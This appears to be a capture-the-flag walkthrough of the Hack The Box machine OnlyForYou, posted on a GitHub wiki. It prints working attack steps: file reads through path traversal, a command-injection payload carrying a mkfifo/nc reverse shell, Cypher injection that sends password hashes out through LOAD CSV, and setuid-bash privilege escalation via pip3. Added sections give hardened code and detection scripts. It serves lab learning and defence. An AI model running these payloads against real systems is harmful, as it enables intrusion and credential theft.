HTB_onlyforyou - meruneru/tech_memo GitHub Wiki
```
# No scripts, all ports
nmap -Pn -p- --min-rate 5000 -oN nmap.txt onlyforyou.htb
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
```
```
# Then scan only the discovered ports with version detection and default scripts
nmap -sV -sC -Pn -p 22,80 --min-rate 5000 -oN nmap.txt onlyforyou.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e8:83:e0:a9:fd:43:df:38:19:8a:aa:35:43:84:11:ec (RSA)
| 256 83:f2:35:22:9b:03:86:0c:16:cf:b3:fa:9f:5a:cd:08 (ECDSA)
|_ 256 44:5f:7a:a3:77:69:0a:77:78:9b:04:e0:9f:11:db:80 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://only4you.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
UDP

```
$ sudo nmap -sU --top-ports 20 onlyforyou.htb
```

Port 80 redirects to http://only4you.htb/, so add that name to /etc/hosts and access it.
Names listed on the site: Walter White, Sarah Jhonson, William Anderson, Amanda Jepson
Nothing in particular found.
```
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ gobuster dir -u only4you.htb -w ~/SecLists/Discovery/Web-Content/common.txt
```

```
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ gobuster dir -u beta.only4you.htb -w ~/SecLists/Discovery/Web-Content/common.txt
===============================================================
2023/08/14 23:29:25 Starting gobuster in directory enumeration mode
===============================================================
/download (Status: 405) [Size: 683]
/list (Status: 200) [Size: 5934]
/resize (Status: 200) [Size: 2984]
/source (Status: 200) [Size: 12127]
Progress: 4701 / 4703 (99.96%)
```
Fuzzing for subdomains showed that a `beta` subdomain exists.

```
$ sudo wfuzz -w /home/kali/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -c -f wfuzz-output.txt -u "only4you.htb" -H "HOST:FUZZ.only4you.htb" --hc 301
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000033: 200 51 L 145 W 2190 Ch "beta - beta"
```
Add beta.only4you.htb to /etc/hosts and access it.
The source code can be downloaded from /source.
The app uses PIL for resize and convert, but there was no usable PIL vulnerability.
In /download, passing an absolute path on the server as the filename looks like it would allow retrieving arbitrary files.
The POST to /download is sent when, after uploading an image on the resize page, you press the button on the /list page.
```python
@app.route('/download', methods=['POST'])
def download():
    image = request.form['image']
    filename = posixpath.normpath(image)
    # Only '..' is rejected; an absolute path such as /etc/passwd passes this check
    if '..' in filename or filename.startswith('../'):
        flash('Hacking detected!', 'danger')
        return redirect('/list')
    # An absolute filename skips the join with LIST_FOLDER and is used as-is
    if not os.path.isabs(filename):
        filename = os.path.join(app.config['LIST_FOLDER'], filename)
    try:
        if not os.path.isfile(filename):
            flash('Image doesn\'t exist!', 'danger')
            return redirect('/list')
    except (TypeError, ValueError):
        raise BadRequest()
    return send_file(filename, as_attachment=True)
```
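Added example (my own code, not the box's source): the check above inspects the raw string for `..` and never rejects an absolute path, so `/etc/passwd` survives `posixpath.normpath` unchanged and `os.path.isabs` then skips the join with the upload directory. The hardened version below refuses absolute input, resolves the joined path, and only then tests that the result still lies inside the base directory; `LIST_FOLDER` is a constructed placeholder for `app.config['LIST_FOLDER']`.

```python
import os
import posixpath

# Constructed placeholder; the real app reads this from app.config['LIST_FOLDER'].
LIST_FOLDER = "/var/www/beta.only4you.htb/uploads"


def original_rejects(image: str) -> bool:
    """Mirror of the page's check. Returns True when the request would be
    rejected. An absolute path never contains '..', so it is not rejected."""
    filename = posixpath.normpath(image)
    return ".." in filename or filename.startswith("../")


def resolve_download_path(image: str, base_dir: str = LIST_FOLDER):
    """Hardened replacement for the lookup.

    Returns the absolute path to serve, or None if the request does not
    resolve to something inside base_dir. The decision is made on the
    resolved path, so absolute input, '..' segments and symlinks pointing
    out of the directory are all caught by one containment test instead
    of a substring match.
    """
    if not image or os.path.isabs(image):
        # Caller-supplied absolute paths are never accepted; every name is
        # interpreted relative to the upload directory.
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, image))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # paths on different drives (Windows) share nothing
        inside = False
    return candidate if inside else None
```

`resolve_download_path` returns the path to hand to `send_file`; a `None` result should be answered with the same generic "image doesn't exist" response as a missing file, so the caller learns nothing about the directory layout.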
Editing the POST in Burp Suite, /etc/passwd could be retrieved as expected.

```
POST /download HTTP/1.1
Host: beta.only4you.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 17
Origin: http://beta.only4you.htb
Connection: close
Referer: http://beta.only4you.htb/list
Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiZGFuZ2VyIiwiSW1hZ2UgaXMgdG9vIHNtYWxsISBNaW5pbXVtIHNpemUgbmVlZHMgdG8gYmUgNzAweDcwMCJdfV19.ZNsJJw.wkaMxVRUjM9Yd8Wz-JGbRV4MM7c
Upgrade-Insecure-Requests: 1

image=/etc/passwd
```
There seem to be four accounts with a shell: root, john, neo4j and dev.
Judging from the list of company officers, john looks like the interesting one.
Walter White Sarah Jhonson William Anderson Amanda Jepson
```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
john:x:1000:1000:john:/home/john:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
fwupd-refresh:x:114:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
_laurel:x:996:996::/var/log/laurel:/bin/false
```
Let's also fetch the nginx configuration (sites-enabled) the same way. The directory layout is described here:
https://medium.com/adrixus/beginners-guide-to-nginx-configuration-files-527fcd6d5efd

Server Configuration
- /etc/nginx: The NGINX configuration directory. All of the Nginx configuration files reside here.
- /etc/nginx/nginx.conf: The main NGINX configuration file. This can be modified to make changes to the NGINX global configuration.
- /etc/nginx/sites-available/: The directory where per-site “server blocks” can be stored. NGINX will not use the configuration files found in this directory unless they are linked to the sites-enabled directory (see below). Typically, all server block configuration is done in this directory, and then enabled by linking to the other directory.
- /etc/nginx/sites-enabled/: The directory where enabled per-site “server blocks” are stored. Typically, these are created by linking to configuration files found in the sites-available directory.
- /etc/nginx/snippets: This directory contains configuration fragments that can be included elsewhere in the NGINX configuration. Potentially repeatable configuration segments are good candidates for refactoring into snippets.
```
server {
    listen 80;
    return 301 http://only4you.htb$request_uri;
}
server {
    listen 80;
    server_name only4you.htb;
    location / {
        include proxy_params;
        proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
    }
}
server {
    listen 80;
    server_name beta.only4you.htb;
    location / {
        include proxy_params;
        proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
    }
}
```
Under /var/www/only4you.htb/ there is a second service laid out just like beta. Fetch /var/www/only4you.htb/app.py and /var/www/only4you.htb/form.py the same way.
The domain part of the e-mail address in the contact form on the top page has a command injection vulnerability: the domain is interpolated into a shell command string.

```python
for domain in domains:
    result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
```
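Added example (my own code, not the box's form.py): `run([f"dig txt {domain}"], shell=True, ...)` hands the domain to `/bin/sh`, so a `|` inside the address becomes a second command. The version below takes the domain from the address, validates it as a hostname, and passes it to `dig` as one argv element with no shell in between, so shell metacharacters are never interpreted even if the validation were loosened. Function names and the hostname regex are my own.

```python
import re
import subprocess
from subprocess import PIPE

# A hostname label: letters, digits and hyphens, no leading or trailing hyphen,
# at most 63 characters. A domain is two or more labels joined by dots.
_LABEL = r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
DOMAIN_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})+$")


def domain_of(email: str) -> str:
    """Return the part after the last '@', or '' if there is none."""
    if "@" not in email:
        return ""
    return email.rsplit("@", 1)[1]


def is_valid_domain(domain: str) -> bool:
    """Reject anything that is not a plain hostname (pipes, spaces, URLs ...)."""
    return len(domain) <= 253 and DOMAIN_RE.fullmatch(domain) is not None


def build_dig_argv(domain: str) -> list:
    """argv for the TXT lookup the page's loop performs. The domain is a
    single argument, never shell text, so '|', ';' or '$(...)' in it would
    reach dig as part of the name and not as commands."""
    if not is_valid_domain(domain):
        raise ValueError(f"not a valid domain: {domain!r}")
    return ["dig", "txt", domain]


def lookup_txt(email: str, timeout: float = 10.0) -> str:
    """Safe counterpart of the page's loop body: shell=False, list argv,
    bounded runtime. Raises ValueError on an invalid domain."""
    argv = build_dig_argv(domain_of(email))
    result = subprocess.run(argv, stdout=PIPE, stderr=PIPE,
                            timeout=timeout, check=False)
    return result.stdout.decode(errors="replace")
```

Two layers are at work: the regex is the input validation a form should do anyway, and the list-form `subprocess.run` without `shell=True` is what removes the injection primitive. Either alone blocks the payload shown on this page; together they also survive future edits that relax one of them.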
```
POST / HTTP/1.1
Host: only4you.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://only4you.htb
Connection: close
Referer: http://only4you.htb/
Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiZGFuZ2VyIiwiWW91IGFyZSBub3QgYXV0aG9yaXplZCEiXX1dfQ.ZNsp1A.I4KGKeqGJZ4JU1ymvvcv0sokmkk
Upgrade-Insecure-Requests: 1

name=myname&email=myemail%40example.com|curl+http%3a//10.10.14.16&subject=subject&message=message
```
curl was executed from the server back to my machine.

```
┌──(kali㉿kali)-[~/htb/onlyforyou/extr/top]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.210] 47758
GET / HTTP/1.1
Host: 10.10.14.16
User-Agent: curl/7.68.0
Accept: */*
```
The reverse shell was generated with the site below and worked as-is. https://www.revshells.com/

```
nc -lvnp 4242
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.16 4242 >/tmp/f
```
```
POST / HTTP/1.1
Host: only4you.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Origin: http://only4you.htb
Connection: close
Referer: http://only4you.htb/
Cookie: session=eyJfZmxhc2hlcyI6W3siIHQiOlsiZGFuZ2VyIiwiWW91IGFyZSBub3QgYXV0aG9yaXplZCEiXX1dfQ.ZNsp1A.I4KGKeqGJZ4JU1ymvvcv0sokmkk
Upgrade-Insecure-Requests: 1

name=myname&email=myemail%40example.com|rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.10.14.16%204242%20%3E%2Ftmp%2Ff&subject=subject&message=message
```
```
www-data@only4you:~$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@only4you:~$ env
env
SERVER_SOFTWARE=gunicorn/20.0.4
PWD=/var/www
LOGNAME=www-data
HOME=/var/www
LANG=en_US.UTF-8
INVOCATION_ID=2e8311118c614b4c9b192e458a396613
USER=www-data
SHLVL=2
JOURNAL_STREAM=9:38339
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
OLDPWD=/var/www/only4you.htb
_=/usr/bin/env
```
Check the listening ports with netstat. Ports 3000 and 8001, bound to localhost only, look suspicious.

```
www-data@only4you:~$ netstat -ntlp
netstat -ntlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1027/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8001 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:7474 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:7687 :::* LISTEN -
```
Have the victim download chisel. (Without --limit-rate the transfer stops partway through.)

```
$ wget --limit-rate=1k --tries=3 http://10.10.14.16:8000/chisel.zip
```

Forward ports 3000 and 8001 to the local machine with chisel (server on the attack box, client on the victim).

```
$ chisel server -p 8005 --reverse
# ./chisel client 10.10.14.16:8005 R:3000:127.0.0.1:3000 R:8001:127.0.0.1:8001
```
Run nmap against localhost through the forwarded ports.

```
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ nmap -sV -sC -Pn -p 3000,8001 --min-rate 5000 -oN nmap.txt localhost
PORT STATE SERVICE VERSION
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
| Set-Cookie: i_like_gogs=cc2879fa9ec6da03; Path=/; HttpOnly
| Set-Cookie: _csrf=x4UeViA2q-FDzDPdXZJzVBJIlTY6MTY5MjE0ODg2MTc3NTA3NDIxNQ; Path=/; Domain=127.0.0.1; Expires=Thu, 17 Aug 2023 01:21:01 GMT; HttpOnly
| X-Content-Type-Options: nosniff
...
8001/tcp open http Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
| http-title: Login
|_Requested resource was /login
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
...
```
The following can now be reached: http://localhost:3000 (the i_like_gogs cookie identifies it as Gogs) and http://localhost:8001
Port 8001 could be logged into with admin/admin.
Looking around the site, there is a DB in the background, and they appear to have recently migrated to a DB called neo4j.
Searching for neo4j injection turned up the following: https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j#extracting-information
Putting the URL-encoded form of the following into the search query returned server information.

```
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.16:80/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
```
```
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ nc -lnvp 80
listening on [any] 80 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.11.210] 38482
GET /?version=5.6.0&name=Neo4j Kernel&edition=community HTTP/1.1
User-Agent: NeoLoadCSV_Java/17.0.6+10-Ubuntu-0ubuntu120.04.1
Host: 10.10.14.16
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
```
Listing the labels showed there are two: user and employee.

```
'OR 1=1 WITH 1 as a CALL db.labels() yield label LOAD CSV FROM 'http://10.10.14.16/?label='+label as l RETURN 0 as _0 //
```
```
┌──(kali㉿kali)-[~/htb/onlyforyou]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.210 - - [15/Aug/2023 22:04:44] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:04:45] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:04:46] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:04:46] "GET /?label=employee HTTP/1.1" 200 -
```
Specify the user label and enumerate every property of those nodes.

```
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.16/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
```

```
10.10.11.210 - - [15/Aug/2023 22:10:46] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:47] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:48] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:48] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:49] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:49] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:50] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:51] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:51] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:52] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [15/Aug/2023 22:10:53] "GET /?username=john HTTP/1.1" 200 -
```
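Added example (my own code; the page does not show the application's query, so its shape is assumed): the injection works because the search value is spliced into Cypher text, a quote closes the string literal, and `//` comments out the rest of the original query. `vulnerable_query` reproduces that pattern, `parameterized_query` shows the fix with a driver parameter (`$search`), and `cypher_injection_markers` / `scan_access_log` flag this page's style of payload in request logs. The log lines and the `/search` path are constructed.

```python
import re
from urllib.parse import quote_plus, unquote_plus


def vulnerable_query(search: str) -> str:
    """String concatenation: the user's text becomes part of the query."""
    return f"MATCH (e:employee) WHERE e.name CONTAINS '{search}' RETURN e"


def parameterized_query(search: str):
    """Fixed form: the value travels as a driver parameter, e.g.
    session.run(query, search=value) with the neo4j driver. The server never
    parses it as Cypher, so quotes, CALL or LOAD CSV in it stay inert data."""
    query = "MATCH (e:employee) WHERE e.name CONTAINS $search RETURN e"
    return query, {"search": search}


# Patterns characteristic of Cypher exfiltration through a search field.
INJECTION_MARKERS = {
    "load-csv": re.compile(r"\bLOAD\s+CSV\b", re.I),
    "procedure-call": re.compile(r"\bCALL\s+(?:dbms|db|apoc)\.", re.I),
    "tautology": re.compile(r"'\s*OR\s+1\s*=\s*1\b", re.I),
    "comment-tail": re.compile(r"//\s*$"),
}


def cypher_injection_markers(raw_value: str) -> list:
    """Names of the markers that match a (possibly URL-encoded) value."""
    decoded = unquote_plus(raw_value)
    return [name for name, rx in INJECTION_MARKERS.items() if rx.search(decoded)]


# Constructed sample: the label-listing payload from this page, URL-encoded
# the way a browser or Burp would send it, plus one benign search.
PAGE_PAYLOAD = ("' OR 1=1 WITH 1 as a CALL db.labels() yield label "
                "LOAD CSV FROM 'http://10.10.14.16/?label='+label as l "
                "RETURN 0 as _0 //")
PAGE_PAYLOAD_ENCODED = quote_plus(PAGE_PAYLOAD)
SAMPLE_ACCESS_LOG = [
    '127.0.0.1 - - [15/Aug/2023:22:04:40 +0000] '
    '"GET /search?search=john HTTP/1.1" 200 512',
    '127.0.0.1 - - [15/Aug/2023:22:04:44 +0000] '
    '"GET /search?search=' + PAGE_PAYLOAD_ENCODED + ' HTTP/1.1" 200 512',
]


def scan_access_log(lines) -> list:
    """(request_target, markers) for every request whose query string trips
    a marker. If the search field is sent in a POST body, apply
    cypher_injection_markers to that field inside the application instead;
    bodies never reach the access log."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if not m:
            continue
        target = m.group(1)
        query_string = target.split("?", 1)[1] if "?" in target else ""
        markers = cypher_injection_markers(query_string)
        if markers:
            hits.append((target, markers))
    return hits
```

The parameterized form is the actual fix; the markers are for spotting attempts after the fact (or in a WAF rule) and will miss payloads that avoid these keywords, so they complement the fix rather than replace it.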
The password hashes can also be cracked with crackstation. https://crackstation.net/
john's password is ThisIs4You
With that, SSH in and grab the user flag!
Looking at "sudo -l", pip3 can be run as root to download files from port 3000 (Gogs).
```
-bash-5.0$ cat user.txt
-bash-5.0$ sudo -l
Matching Defaults entries for john on only4you:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User john may run the following commands on only4you:
(root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz
```
Searching for "pip download exploit" hit the site below.
https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/pip-download-code-execution/
Using the method described there, build a package (one that sets the setuid bit on /usr/bin/bash), create a repository on Gogs (ID: john, PW: ThisIs4You), and push the built package to Gogs from john's terminal.
After the push, the permissions of bash have changed, so root is obtained with bash -p.
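Added example (my own code): the sudo rule above is dangerous because `pip3 download` of a source tarball runs the package's setup.py to obtain metadata, so whoever can push a `.tar.gz` to the Gogs repository matched by the wildcard controls code that runs as root. The audit below parses `sudo -l` output of the shape shown above and reports rules that combine a code-executing binary, a wildcard operand and NOPASSWD. The binary list and the risk labels are my own choices, and the second sample rule is constructed.

```python
import os
import re
import shlex

# Binaries whose normal operation runs code chosen by the caller (package
# tools that execute setup.py, interpreters, pagers and editors with shell
# escapes). This set is an assumption for the example, not a standard list.
CODE_EXEC_BINARIES = {
    "pip", "pip3", "python", "python3", "perl", "ruby", "node",
    "npm", "gem", "vim", "vi", "less", "more", "find", "tar",
}

# '(runas) TAG: TAG: command args' as printed by 'sudo -l'
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def parse_rule(line: str):
    """Parse one rule line from 'sudo -l'; None for non-rule lines."""
    m = RULE_RE.match(line)
    if not m:
        return None
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    # sudoers escapes ':' as '\:'; undo that before tokenising the command
    argv = shlex.split(m.group("cmd").replace("\\:", ":"))
    return {"runas": m.group("runas"), "tags": tags, "argv": argv}


def audit_rule(line: str):
    """Return a finding dict for a rule line, or None if it is not a rule."""
    rule = parse_rule(line)
    if rule is None or not rule["argv"]:
        return None
    binary = os.path.basename(rule["argv"][0])
    findings = []
    code_exec = binary in CODE_EXEC_BINARIES
    wildcard = any(ch in arg for arg in rule["argv"][1:] for ch in "*?[")
    if code_exec:
        findings.append(f"{binary} can execute caller-controlled code")
    if wildcard:
        findings.append("wildcard operand: the caller chooses what is processed")
    if "NOPASSWD" in rule["tags"]:
        findings.append("NOPASSWD: no authentication at use time")
    risk = "high" if (code_exec or wildcard) else "low"
    return {"binary": binary, "runas": rule["runas"],
            "risk": risk, "findings": findings}


def audit_sudo_l(output: str) -> list:
    """Audit every rule line in a 'sudo -l' transcript."""
    results = [audit_rule(line) for line in output.splitlines()]
    return [r for r in results if r is not None]


# Sample input: the first rule is the one from this box, the second is constructed.
SAMPLE_SUDO_L = "\n".join([
    "User john may run the following commands on only4you:",
    "(root) NOPASSWD: /usr/bin/pip3 download http\\://127.0.0.1\\:3000/*.tar.gz",
    "(root) NOPASSWD: /usr/bin/systemctl restart nginx",
])
```

Running `audit_sudo_l` over the sample marks the pip3 rule high (three findings) and the systemctl rule low (only NOPASSWD). The remediation that follows from the findings is to drop the wildcard and point the rule at a fixed, root-owned artefact, or to replace the rule with a wrapper script that does the download itself without invoking setup.py.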
```
-bash-5.0$ ls -l /usr/bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18 2022 /usr/bin/bash
bash-5.0$ bash -p
bash-5.0# cat /root/root.txt
```